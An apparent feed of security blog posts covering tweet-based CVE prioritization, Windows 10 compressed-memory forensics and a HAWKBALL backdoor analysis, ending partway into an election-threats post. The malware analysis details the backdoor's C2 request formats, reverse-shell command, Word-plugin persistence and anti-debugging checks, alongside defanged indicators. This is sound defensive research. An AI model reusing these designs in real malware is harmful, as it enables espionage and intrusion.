Normal view

There are new articles available, click to refresh the page.
Before yesterdayThreat Research

Showing Vulnerability to a Machine: Automated Prioritization of Software Vulnerabilities

13 August 2019 at 16:45

Introduction

If a software vulnerability can be detected and remedied, then a potential intrusion is prevented. While not all software vulnerabilities are known, 86 percent of vulnerabilities leading to a data breach were patchable, though there is some risk of inadvertent damage when applying software patches. When new vulnerabilities are identified they are published in the Common Vulnerabilities and Exposures (CVE) dictionary by vulnerability databases, such as the National Vulnerability Database (NVD).

The Common Vulnerabilities Scoring System (CVSS) provides a metric for prioritization that is meant to capture the potential severity of a vulnerability. However, it has been criticized for a lack of timeliness, vulnerable population representation, normalization, rescoring and broader expert consensus that can lead to disagreements. For example, some of the worst exploits have been assigned low CVSS scores. Additionally, CVSS does not measure the vulnerable population size, which many practitioners have stated they expect it to score. The design of the current CVSS system leads to too many severe vulnerabilities, which causes user fatigue. ­

To provide a more timely and broad approach, we use machine learning to analyze users’ opinions about the severity of vulnerabilities by examining relevant tweets. The model predicts whether users believe a vulnerability is likely to affect a large number of people, or if the vulnerability is less dangerous and unlikely to be exploited. The predictions from our model are then used to score vulnerabilities faster than traditional approaches, like CVSS, while providing a different method for measuring severity, which better reflects real-world impact.

Our work uses nowcasting to address this important gap of prioritizing early-stage CVEs to know if they are urgent or not. Nowcasting is the economic discipline of determining a trend or a trend reversal objectively in real time. In this case, we are recognizing the value of linking social media responses to the release of a CVE after it is released, but before it is scored by CVSS. Scores of CVEs should ideally be available as soon as possible after the CVE is released, while the current process often hampers prioritization of triage events and ultimately slows response to severe vulnerabilities. This crowdsourced approach reflects numerous practitioner observations about the size and widespread nature of the vulnerable population, as shown in Figure 1. For example, in the Mirai botnet incident in 2017 a massive number of vulnerable IoT devices were compromised leading to the largest Denial of Service (DoS) attack on the internet at the time.


Figure 1: Tweet showing social commentary on a vulnerability that reflects severity

Model Overview

Figure 2 illustrates the overall process that starts with analyzing the content of a tweet and concludes with two forecasting evaluations. First, we run Named Entity Recognition (NER) on tweet contents to extract named entities. Second, we use two classifiers to test the relevancy and severity towards the pre-identified entities. Finally, we match the relevant and severe tweets to the corresponding CVE.


Figure 2: Process overview of the steps in our CVE score forecasting

Each tweet is associated to CVEs by inspecting URLs or the contents hosted at a URL. Specifically, we link a CVE to a tweet if it contains a CVE number in the message body, or if the URL content contains a CVE. Each tweet must be associated with a single CVE and must be classified as relevant to security-related topics to be scored. The first forecasting task considers how well our model can predict the CVSS rankings ahead of time. The second task is predicting future exploitation of the vulnerability for a CVE based on Symantec Antivirus Signatures and Exploit DB. The rationale is that eventual presence in these lists indicates not just that exploits can exist or that they do exist, but that they also are publicly available.

Modeling Approach

Predicting the CVSS scores and exploitability from Twitter data involves multiple steps. First, we need to find appropriate representations (or features) for our natural language to be processed by machine learning models. In this work, we use two natural language processing methods in natural language processing for extracting features from text: (1) N-grams features, and (2) Word embeddings. Second, we use these features to predict if the tweet is relevant to the cyber security field using a classification model. Third, we use these features to predict if the relevant tweets are making strong statements indicative of severity. Finally, we match the severe and relevant tweets up to the corresponding CVE.

N-grams are word sequences, such as word pairs for 2-gram or word triples for 3-grams. In other words, they are contiguous sequence of n words from a text. After we extract these n-grams, we can represent original text as a bag-of-ngrams. Consider the sentence:

A criticial vulnerability was found in Linux.

If we consider all 2-gram features, then the bag-of-ngrams representation contains “A critical”, “critical vulnerability”, etc.

Word embeddings are a way to learn the meaning of a word by how it was used in previous contexts, and then represent that meaning in a vector space. Word embeddings know the meaning of a word by the company it keeps, more formally known as the distribution hypothesis. These word embedding representations are machine friendly, and similar words are often assigned similar representations. Word embeddings are domain specific. In our work, we additionally train terminology specific to cyber security topics, such as related words to threats are defenses, cyberrisk, cybersecurity, threat, and iot-based. The embedding would allow a classifier to implicitly combine the knowledge of similar words and the meaning of how concepts differ. Conceptually, word embeddings may help a classifier use these embeddings to implicitly associate relationships such as:

device + infected = zombie

where an entity called device has a mechanism applied called infected (malicious software infecting it) then it becomes a zombie.

To address issues where social media tweets differ linguistically from natural language, we leverage previous research and software from the Natural Language Processing (NLP) community. This addresses specific nuances like less consistent capitalization, and stemming to account for a variety of special characters like ‘@’ and ‘#’.


Figure 3: Tweet demonstrating value of identifying named entities in tweets in order to gauge severity

Named Entity Recognition (NER) identifies the words that construct nouns based on their context within a sentence, and benefits from our embeddings incorporating cyber security words. Correctly identifying the nouns using NER is important to how we parse a sentence. In Figure 3, for instance, NER facilitates Windows 10 to be understood as an entity while October 2018 is treated as elements of a date. Without this ability, the text in Figure 3 may be confused with the physical notion of windows in a building.

Once NER tokens are identified, they are used to test if a vulnerability affects them. In the Windows 10 example, Windows 10 is the entity and the classifier will predict whether the user believes there is a serious vulnerability affecting Windows 10. One prediction is made per entity, even if a tweet contains multiple entities. Filtering tweets that do not contain named entities reduces tweets to only those relevant to expressing observations on a software vulnerability.

From these normalized tweets, we can gain insight into how strongly users are emphasizing the importance of the vulnerability by observing their choice of words. The choice of adjective is instrumental in the classifier capturing the strong opinions. Twitter users often use strong adjectives and superlatives to convey magnitude in a tweet or when stressing the importance of something related to a vulnerability like in Figure 4. This magnitude often indicates to the model when a vulnerability’s exploitation is widespread. Table 1 shows our analysis of important adjectives that tend to indicate a more severe vulnerability.


Figure 4: Tweet showing strong adjective use


Table 1: Log-odds ratios for words correlated with highly-severe CVEs

Finally, the processed features are evaluated with two different classifiers to output scores to predict relevancy and severity. When a named entity is identified all words comprising it are replaced with a single token to prevent the model from biasing toward that entity. The first model uses an n-gram approach where sequences of two, three, and four tokens are input into a logistic regression model. The second approach uses a one-dimensional Convolutional Neural Network (CNN), comprised of an embedding layer, a dropout layer then a fully connected layer, to extract features from the tweets.

Evaluating Data

To evaluate the performance of our approach, we curated a dataset of 6,000 tweets containing the keywords vulnerability or ddos from Dec 2017 to July 2018. Workers on Amazon’s Mechanical Turk platform were asked to judge whether a user believed a vulnerability they were discussing was severe. For all labeling, multiple users must independently agree on a label, and multiple statistical and expert-oriented techniques are used to eliminate spurious annotations. Five annotators were used for the labels in the relevancy classifier and ten annotators were used for the severity annotation task. Heuristics were used to remove unserious respondents; for example, when users did not agree with other annotators for a majority of the tweets. A subset of tweets were expert-annotated and used to measure the quality of the remaining annotations.

Using the features extracted from tweet contents, including word embeddings and n-grams, we built a model using the annotated data from Amazon Mechanical Turk as labels. First, our model learns if tweets are relevant to a security threat using the annotated data as ground truth. This would remove a statement like “here is how you can #exploit tax loopholes” from being confused with a cyber security-related discussion about a user exploiting a software vulnerability as a malicious tool. Second, a forecasting model scores the vulnerability based on whether annotators perceived the threat to be severe.

CVSS Forecasting Results

Both the relevancy classifier and the severity classifier were applied to various datasets. Data was collected from December 2017 to July 2018. Most notably 1,000 tweets were held-out from the original 6,000 to be used for the relevancy classifier and 466 tweets were held-out for the severity classifier. To measure the performance, we use the Area Under the precision-recall Curve (AUC), which is a correctness score that summarizes the tradeoffs of minimizing the two types of errors (false positive vs false negative), with scores near 1 indicating better performance.

  • The relevancy classifier scored 0.85
  • The severity classifier using the CNN scored 0.65
  • The severity classifier using a Logistic Regression model, without embeddings, scored 0.54

Next, we evaluate how well this approach can be used to forecast CVSS ratings. In this evaluation, all tweets must occur a minimum of five days ahead of CVSS scores. The severity forecast score for a CVE is defined as the maximum severity score among the tweets which are relevant and associated with the CVE. Table 1 shows the results of three models: randomly guessing the severity, modeling based on the volume of tweets covering a CVE, and the ML-based approach described earlier in the post. The scoring metric in Table 2 is precision at top K using our logistic regression model. For example, where K=100, this is a way for us to identify what percent of the 100 most severe vulnerabilities were correctly predicted. The random model would predicted 59, while our model predicted 78 of the top 100 and all ten of the most severe vulnerabilities.


Table 2: Comparison of random simulated predictions, a model based just on quantitative features like “likes”, and the results of our model

Exploit Forecasting Results

We also measured the practical ability of our model to identify the exploitability of a CVE in the wild, since this is one of the motivating factors for tracking. To do this, we collected severe vulnerabilities that have known exploits by their presence in the following data sources:

  • Symantec Antivirus signatures
  • Symantec Intrusion Prevention System signatures
  • ExploitDB catalog

The dataset for exploit forecasting was comprised of 377,468 tweets gathered from January 2016 to November 2017. Of the 1,409 CVEs used in our forecasting evaluation, 134 publicly weaponized vulnerabilities were found across all three data sources.

Using CVEs from the aforementioned sources as ground truth, we find our CVE classification model is more predictive of detecting operationalized exploits from the vulnerabilities than CVSS. Table 3 shows precision scores illustrating seven of the top ten most severe CVEs and 21 of the top 100 vulnerabilities were found to have been exploited in the wild. Compare that to one of the top ten and 16 of the top 100 from using the CVSS score itself. The recall scores show the percentage of our 134 weaponized vulnerabilities found in our K examples. In our top ten vulnerabilities, seven were found to be in the 134 (5.2%), while the CVSS scoring’s top ten included only one (0.7%) CVE being exploited.


Table 3: Precision and recall scores for the top 10, 50 and 100 vulnerabilities when comparing CVSS scoring, our simplistic volume model and our NLP model

Conclusion

Preventing vulnerabilities is critical to an organization’s information security posture, as it effectively mitigates some cyber security breaches. In our work, we found that social media content that pre-dates CVE scoring releases can be effectively used by machine learning models to forecast vulnerability scores and prioritize vulnerabilities days before they are made available. Our approach incorporates a novel social sentiment component, which CVE scores do not, and it allows scores to better predict real-world exploitation of vulnerabilities. Finally, our approach allows for a more practical prioritization of software vulnerabilities effectively indicating the few that are likely to be weaponized by attackers. NIST has acknowledged that the current CVSS methodology is insufficient. The current process of scoring CVSS is expected to be replaced by ML-based solutions by October 2019, with limited human involvement. However, there is no indication of utilizing a social component in the scoring effort.

This work was led by researchers at Ohio State under the IARPA CAUSE program, with support from Leidos and FireEye. This work was originally presented at NAACL in June 2019, our paper describes this work in more detail and was also covered by Wired.

Finding Evil in Windows 10 Compressed Memory, Part Three: Automating Undocumented Structure Extraction

8 August 2019 at 20:45

This is the final post in the three-part series: Finding Evil in Windows 10 Compressed Memory. In the first post (Volatility and Rekall Tools), the FLARE team introduced updates to both memory forensic toolkits. These updates enabled these open source tools to analyze previously inaccessible compressed data in memory. This research was shared with the community at the 2019 SANS DFIR Austin conference and is available on GitHub (Volatility and Rekall). In the second post (Virtual Store Deep Dive), we looked at the structures and algorithms involved in locating and extracting compressed pages from the Store Manager. The post included a walkthrough of a memory dump designed for analysts to be able to recreate in their own Windows 10 environments. The structures referenced in the walkthrough were all previously analyzed in a disassembler, a manual effort which came in at around eight hours. As you’d expect, this task quickly became a candidate for automation. Our analysis time is now under two minutes!

This final post accompanies my and Dimiter Andonov's BlackHat USA 2019 talk with the series title and seeks to describe the challenges faced in maintaining software that ultimately relies on undocumented structures. Here we introduce a solution to reduce the level of effort of analyzing undocumented structures.

Overview

Undocumented structures within the Windows kernel are always subject to change. The flexibility granted by not publicizing a structure’s composition can be invaluable to a development team. It can allow for the system to grow unencumbered by the need to update helper functions and public documentation. In many cases, even when a publicly available API designed to access the undocumented structures can be leveraged on a live system, incident responders and memory forensic analysts don’t have the luxury of utilizing them. DFIR analysts operating on memory extractions or snapshots ultimately using tools which must recreate the job of an API by manually parsing and traversing structures and reimplementing algorithms used.

Unfortunately, these structures and algorithms are not always up to date in the analysts’ toolkit, leading to incomplete extractions or completely broken investigations. These tools may cease to work after any given update. This is the case with the Windows kernel’s Store Manager component. Structures relied on to locate compressed data in RAM are constantly evolving. This requires some flexibility built into the plugins and a means of reducing the analysis time required to reconstruct these structures.

Leveraging flare-emu

To ease my Store Manager analysis efforts, I looked into Tom Bennett’s flare-emu utility. flare-emu can be viewed as the marriage of IDA Pro with the Unicorn emulation engine. The original use of the framework was to clean up Objective-C function call names due to ambiguity stemming from the unknown id argument for calls to objc_msgSend. Tom was able to use emulation to resolve the ambiguity and clean up his analysis environment. The value I saw in the framework was that the barrier to entry for using Unicorn was now lowered to a point where it could be used to rapidly prototype ideas. flare-emu handles PE loading, memory faults, and function calls while guaranteeing traversal over code you would like to reach.

After analyzing a dozen Windows 10 kernels, I had become familiar enough with the process to begin automating the effort. The automation of undocumented structures and algorithms requires one or more of the following properties to remain constant across builds.

  • Structure locations
  • Function prototypes
  • Order of structure memory access
  • Structure field usage
  • Callstacks

Let’s explore the example of locating the offset of ST_DATA_MGR.wCompressionFormat. As shown in Figure 1, this field is the first argument to RtlDecompressBufferEx. This function is publicly available and documented. This is how we originally derived that offset 0x220 in the ST_DATA_MGR structure corresponded to the compression format of the store page in Windows 10 1703 (x86).


Figure 1: Call to RtlDecompressBuferEx, note that the compression format originates from ST_DATA_MGR

To leverage flare-emu in automating the extraction of the value 0x220, we have a few options. For example, from analysis of other kernels, we know that the access to ST_DATA_MGR immediately before decompression is likely to be the compression format. In this case, a stronger extraction algorithm can be leveraged by prepopulating ST_DATA_MGR with a known pattern (see Figure 2).


Figure 2: Known pattern copied into ST_DATA_MGR buffer

Using flare-emu, we emulate the function in which this call is located and examine the stack post-emulation.

0x20101000

0x1163

0x31001200

0x1423

0x20001400

“Km”

Figure 3: Post-emulation stack layout

Knowing that the wCompressionFormat argument originated from the ST_DATA_MGR structure, we see that it is now “Km”. If we were to search for that value in the known pattern, we would find that it begins at offset 0x220. Check out Figure 4 to see how we can leverage flare-emu to solve this challenge.


Figure 4: Code snippet from w10deflate_auto project demonstrating the automation of wCompressionFormat

The decorators preceding the function signify that the extraction algorithm will work on both 32-bit and 64-bit architectures. After generating a known pattern using a helper function within my project, flare-emu is used to allocate a buffer, storing a pointer to it in lp_stdatamgr. The pointer is written into the ECX register because I know that the first argument to the parent function, StDmSinglePageCopy is the pointer to the ST_DATA_MGR structure. The pHook function populates ECX prior to the emulation run. The helper function locate_call_in_fn is usedto perform a relaxed search for RtlDecompressBufferEx within StDmSinglePageCopy. Using flare-emu’s iterate function, I force emulation to reach decompression, at which point I read the first item on the stack and then search for it within my known pattern.

Techniques like the one described above are ultimately used to retrieve all structure fields involved in the page decompression and can be leveraged in other situations in which an undocumented structure may need tracking across Windows builds. Figure 5 shows the automation utility extracting the fields of the undocumented structures used by the Volatility and Rekall plugins.


Figure 5: Output of automation from within IDA Pro

Keeping Volatility and Rekall Updated

The data generated by the automation script is primarily useful when implemented in Volatility and Rekall. In both Volatility and Rekall, the win10_memcompression.py overlay contains all structure definitions needed for page location and decompression. Figure 6 shows a snippet from the file in which the Windows 10 1903 x86 profile is created.


Figure 6: Structure definition found within w10_memcompression.py overlay

Create a new profile dictionary (ex. win10_mem_comp_x86_1903) corresponding to the Windows build that you are targeting and populate the structure entries accordingly.

Conclusion

Undocumented structures pose a challenge to those who rely on them. This blog post covered how flare-emu can be leveraged to reduce the level of effort needed to analyze new files. We analyzed the extraction of an ST_DATA_MGR field used in page decompression by presenting the problem and then the code involved with automating the effort. The automation code is available on the FireEye GitHub with usage information and documentation available in both the README and code.

Finding Evil in Windows 10 Compressed Memory, Part Two: Virtual Store Deep Dive

8 August 2019 at 20:30

Introduction

This blog post is the second in a three-part series covering our Windows 10 memory forensics research and it coincides with our BlackHat USA 2019 presentation. In Part One of the series, we covered the integration of the research in both Volatily and Rekall memory forensics tools. We demonstrated that forensic artifacts (including reflectively loaded malware) could remain undiscovered without the FLARE research integration on Windows 10 (available on GitHub at win10_volatility and win10_rekall).

In this post, we demonstrate how to retrieve a compressed page using the structures and algorithms described in our white paper. We track down a compressed page in memory, beginning at its virtual address within a known process. A WinDbg kernel debugger setup is used in this walkthrough, but a similar process could be followed from within a memory snapshot or extraction using Volatility or Rekall.

Finding a Compressed Page

The operating system used in this demo is Windows 10.0.15063.0 (x64) and the structure definitions shown will be applicable across any 1703 build. Note that the two global offsets nt!SmGlobals and nt!MmPagingFile will need to be located for each revision. The process of retrieving these global offsets is described further in our white paper.

To begin analysis, we create a marker page and flush it to the Virtual Store. This can be done in several ways, the easiest of which is allocating memory in a memory constrained virtual machine.  A simple utility (ram_eater.exe) was created to perform this task. The ram_eater utility allocates and writes a marker page, and then repeatedly allocates more memory in user-specified page amounts. In a memory constrained virtual machine (1 GB RAM), the marker page will become stale shortly and be evicted to the virtual store. In Figure 1, ram_eater reports that it has allocated the marker page at address 0x2a368480000. The marker page we used (see Figure 2) was a string beginning with “CC WAS HERE!”.


Figure 1: Allocating a marker page using ram_eater_x64.exe

We can verify the contents of our marker page by locating it in the kernel debugger, viewing its Page Table Entry (PTE) and dumping its corresponding physical memory (see Figure 2). We use the !process extension to locate ram_eater’s EPROCESS structure and switch into the context of the ram_eater process. This ensures that we traverse the correct process-specific page tables for the ram_eater process. Using the page frame number (pfn) described by the hardware PTE, we dump the physical memory to validate the contents of our marker page. Page frame numbers do not include the low-order bits used to specify an offset into a page, therefore they must be multiplied by PAGE_SIZE (0x1000) to identify the actual address of the data.


Figure 2: Locating and viewing the marker page from the kernel debugger

After allocating additional memory using ram_eater, we check to see if the marker page has been sent to the virtual store. Each entry in the output of the !vm extension can be treated as an index in to nt!MmPagingFile (see Figure 3).


Figure 3: PTE of a compressed page in the virtual store an confirmation of virtual store’s PageFile index

In the PTE displayed in Figure 3, the PageFile index (MMPTE_SOFTWARE.PageFileLow) is 2 and corresponds to the “No Name for Paging File” entry in the !vm extension’s output. From general observation, we know that on a default Windows configuration, the last entry corresponds to the virtual store. It is possible to configure systems with more than a single PageFile on disk, so do not assume that PageFile index 2 will always correlate to the virtual store.

A more thorough option to validate page file indices is to disassemble nt!MmStoreCheckPagefiles. This function contains references to two global variables, the number of active PageFiles, as well as an array of pointers to each nt!_MMPAGING_FILE structure (see Figure 4). We use the PageFile structure’s newly introduced VirtualStorePagefile field to confirm if the PageFile represents a virtual store.


Figure 4: Locating nt!MmPagingFile in WinDbg and dumping system’s nt!_MMPAGING_FILE structures

Having confirmed that the marker page is in the virtual store, the next step is to calculate the Store Manager Page Key (SM_PAGE_KEY), as it serves as a pseudo-handle to locate the decompressed page. Our white paper details the process used to calculate the SM_PAGE_KEY, which turns out to be 0x201a3061 for this example. Note, that we will not use the PTE’s swizzle bit in the page key calculations, since the OS build is below 1803. To begin page retrieval, the pointer to the Store Manager’s global structure or nt!SmGlobals needs to be located. This is a straightforward process if symbols are available (see Figure 5).


Figure 5: Dumping nt!SmGlobals

The first thing to observe is that both SMKM_STORE_MGR and SMKM are located at offset 0x0, or directly at nt!SmGlobals. Viewed as a memory dump, nt!SmGlobals appears as an array of pointers. Viewed as a two-dimensional array (32x32) of SMKM_STORE_METADATA elements, each element in the array of pointers points to an array of 32 SMKM_STORE_METADATA structures. Each SMKM_STORE_METADATA structure represents a store. To locate our SM_PAGE_KEY’s corresponding store, we need to find the store index associated with the page key inside the SMKM_STORE_MGR.sGlobalTree B+tree container. The store index is a compound value that yields both indices needed to select the particular SMKM_STORE_METADATA element. Let’s traverse the SMKM_STORE_MGR’s global B+tree (Figure 6). Recall that we are interested in a store manager page key value of 0x201a3061.


Figure 6: Traversing the global B+tree

Now that we have the store index (obtained from the SMKM_FRONTEND_ENTRY structure) we calculate both indices to select the correct SMKM_STORE_METADATA structure for our SM_PAGE_KEY. The index in to the pointer array is the result of dividing the retrieved store index by 32, while the second one is the remainder of the division operation. In our case both indices are 0 and they select the first of the 1024 stores on the system, which is reserved for legacy applications. Universal Windows Platform (UWP) applications, on the other hand, will be placed in stores from 1 to 1023. Now, with the SMKM_STORE_METADATA known, we examine the store’s SMKM_STORE structure, as shown in Figure 7.


Figure 7: Dumping the SMKM_STORE structure

Once we have our SMKM_STORE structure we traverse another B+tree that associates our SM_PAGE_KEY (0x201a3061) with a chunk key. The chunk key is a compound value and once decoded points to a specific page record inside SMHP_CHUNK_METADATA's two-dimensional aChunkPointer array. The B+tree traversal is shown in Figure 8.


Figure 8: Traversing the local B+tree to find the chunk key associated with the SM_PAGE_KEY

After the B+tree traversal is complete we found that our chunk key is 4b02d. Since it’s a compound value we need to decode it in order to retrieve the two indices into SMHP_CHUNK_METADATA’s chunk pointer array, and the offset within the located chunk. The decoding involves four additional SHMP_CHUNK_METADATA fields – dwVectorSize, dwPageRecordsPerChunk, dwPageRecordSize, and dwChunkPageHeaderSize. The process is shown in Figure 9.


Figure 9: Retrieving the page record associated with the chunk key

The decoding of the chunk key in Figure 9 allowed us to find all the information to derive the virtual address of our compressed page. The retrieved REGION_KEY (0xf72397, in our case) is also a compound value that encodes the index within the SMKM_STORE’s region pointer array, as well as the offset within the region of pages. To calculate this data, we parse the region key with the help of two fields inside the ST_DATA_MGR structure – dwRegionIndexMask and dwRegionSizeMask. The calculations are shown in Figure 10.


Figure 10: Calculating the compressed page’s virtual address

The virtual address 0x12f3970 calculated in Figure 10 contains the compressed page of interest. We can retrieve it from the MemCompression process space, as shown in Figure 11. To confirm that the compressed memory is located within MemCompression, check the SMKM_STORE structure’s StoreOwnerProcess field.


Figure 11: Retrieving the compressed page from within MemCompression process space

The compressed page can be decompressed with a call to the RtlDecompressBufferEx API or any other implementation that supports the XPRESS compression algorithm.

Conclusion

In this blog post, we shared a walkthrough in which we forced a known marker page into the compression store and manually retrieved it by walking through memory dumps using known structure offsets from Windows 10 1709 x64. The same techniques used here can be applied to Windows 10 1607 and onwards assuming correct structure offsets are known. In Part 3 of the series, Automating Undocumented Structure Extraction, we will look at how the FLARE team leveraged emulation via flare-emu to automate the extraction of the structures used in this walkthrough.

Resources

Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities

5 June 2019 at 15:00

FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

Figure 1 shows the decoy used in the attack.


Figure 1: Decoy used in attack

The decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory through EQENDT32.EXE. Figure 2 shows the decryption mechanism used in EQENDT32.EXE.


Figure 2: Shellcode decryption routine

The decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP (Figure 3).


Figure 3: Payload dropped as Word plugin

Technical Details

DllMain of the dropped payload determines if the string WORD.EXE is present in the sample’s command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe < C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP\hh14980443.wll, DllEntry> using the WinExec() function.

DllEntry is the payload’s only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. The malware writes the current local time plus two hardcoded values every time in the following format:

<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\t<Hardcoded Digit>\t<Hardcoded Digit>\n

Example:

05/22 07:29:17 4          0

This log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).


Figure 4: String format for log file

The encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and decrypted config file.


Figure 5: Config decryption routine

The IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:

05/22 07:49:48 149.28.182.78.

Mutex Creation

The malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running as a system profile (Figure 6). To verify that the malware resolves the environment variable for %APPDATA%, it checks for the string config/systemprofile.


Figure 6: Verify whether malware is running as a system profile

If the malware is running as a system profile, the string d0c from the decrypted config file is used to create the mutex. Otherwise, the string _cu is appended to d0c and the mutex is named d0c_cu (Figure 7).


Figure 7: Mutex creation

After the mutex is created, the malware writes another entry in the logfile in %TEMP% with the values 32 and 0.

Network Communication

HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as User-Agent. The malware also sets the other fields of request headers such as:

  • Content-Length: <content_length>
  • Cache-Control: no-cache
  • Connection: close

The malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. Figure 8 shows the GET request sent over the network.


Figure 8: Network request

The network request is formed with four parameters in the format shown in Figure 9.

Format = "?t=%d&&s=%d&&p=%s&&k=%d"


Figure 9: GET request parameters formation

Table 1 shows the GET request parameters.

Value

Information

T

Initially set to 0

S

Initially set to 0

P

String from decrypted config at 0x68

k

The result of GetTickCount()

Table 1: GET request parameters

If the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).

Format = "?e=%d&&t=%d&&k=%d"


Figure 10: Second GET request


Figure 11: Second GET request parameters formation

Table 2 shows information about the parameters.

Value

Information

E

Initially Set to 0

T

Initially set to 0

K

The result of GetTickCount()

Table 2: Second GET request parameters

If the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the field Set-Cookie responds with ID=17.

This Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor’s command.


Figure 12: Function table

Table 3 shows the commands supported by HAWKBALL.

Command

Operation Performed

0

Set URI query string to value

16

Unknown

17

Collect system information

18

Execute a provided argument using CreateProcess

19

Execute a provided argument using CreateProcess and upload output

20

Create a cmd.exe reverse shell, execute a command, and upload output

21

Shut down reverse shell

22

Unknown

23

Shut down reverse shell

48

Download file

64

Get drive geometry and free space for logical drives C-Z

65

Retrieve information about provided directory

66

Delete file

67

Move file

Table 3: HAWKBALL commands

Collect System Information

Command ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:

  • Computer Name
  • User Name
  • IP Address
  • Active Code Page
  • OEM Page
  • OS Version
  • Architecture Details (x32/x64)
  • String at 0x68 offset from decrypted config file

This information is retrieved from the victim using the following WINAPI calls:

Format = "%s;%s;%s;%d;%d;%s;%s %dbit"

  • GetComputerNameA
  • GetUserNameA
  • Gethostbyname and inet_ntoa
  • GetACP
  • GetOEMPC
  • GetCurrentProcess and IsWow64Process


Figure 13: System information

The collected system information is concatenated together with a semicolon separating each field:

WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit

This information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is 0xE5044C18.

Once encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.


Figure 14: POST request

In the request header, the field Cookie is set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in field Set-Cookie.

Table 4 shows the parameters of this POST request.

Parameter

Information

E

Initially set to 0

T

Decimal form of the little-endian XOR key

K

The result of GetTickCount()

Table 4: POST request parameters

Create Process

The malware creates a process with specified arguments. Figure 15 shows the operation.


Figure 15: Command create process

Delete File

The malware deletes the file specified as an argument. Figure 16 show the operation.


Figure 16: Delete file operation

Get Directory Information

The malware gets information for the provided directory address using the following WINAPI calls:

  • FindFirstFileW
  • FindNextFileW
  • FileTimeToLocalFileTime
  • FiletimeToSystemTime

Figure 17 shows the API used for collecting information.


Figure 17: Get directory information

Get Disk Information

This command retrieves the drive information for drives C through Z along with available disk space for each drive.


Figure 18: Retrieve drive information

The information is stored in the following format for each drive:

Format = "%d+%d+%d+%d;"

Example: "8+512+6460870+16751103;"

The information for all the available drives is combined and sent to the server using an operation similar to Figure 14.

Anti-Debugging Tricks

Debugger Detection With PEB

The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.


Figure 19: Retrieve value from PEB

NtQueryInformationProcess

The malware uses the NtQueryInformationProcess API to detect if it is being debugged. The following flags are used:

  • Passing value 0x7 to ProcessInformationClass:


Figure 20: ProcessDebugPort verification

  • Passing value 0x1E to ProcessInformationClass:


Figure 21: ProcessDebugFlags verification

  • Passing value 0x1F to ProcessInformationClass:


Figure 22: ProcessDebugObject

Conclusion

HAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.

Indicators of Compromise (IOC)

MD5

Name

AC0EAC22CE12EAC9EE15CA03646ED70C

Doc.rtf

D90E45FBF11B5BBDCA945B24D155A4B2

hh14980443.wll

Network Indicators

  • 149.28.182[.]78:443
  • 149.28.182[.]78:80
  • http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>
  • http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>
  • http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>
  • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)

FireEye Detections

MD5

Product

Signature

Action

AC0EAC22CE12EAC9EE15CA03646ED70C

FireEye Email Security

FireEye Network Security

FireEye Endpoint Security

FE_Exploit_RTF_EQGEN_7

Exploit.Generic.MVX

Block

D90E45FBF11B5BBDCA945B24D155A4B2

FireEye Email Security

FireEye Network Security

FireEye Endpoint Security

Malware.Binary.Dll

FE_APT_Backdoor_Win32_HawkBall_1

APT.Backdoor.Win.HawkBall

Block

Acknowledgement

Thank you to Matt Williams for providing reverse engineering support.

Framing the Problem: Cyber Threats and Elections

30 May 2019 at 15:00

This year, Canada, multiple European nations, and others will host high profile elections. The topic of cyber-enabled threats disrupting and targeting elections has become an increasing area of awareness for governments and citizens globally. To develop solutions and security programs to counter cyber threats to elections, it is important to begin with properly categorizing the threat. In this post, we’ll explore the various threats to elections FireEye has observed and provide a framework for organizations to sort these activities.

The Election Ecosystem: Targets

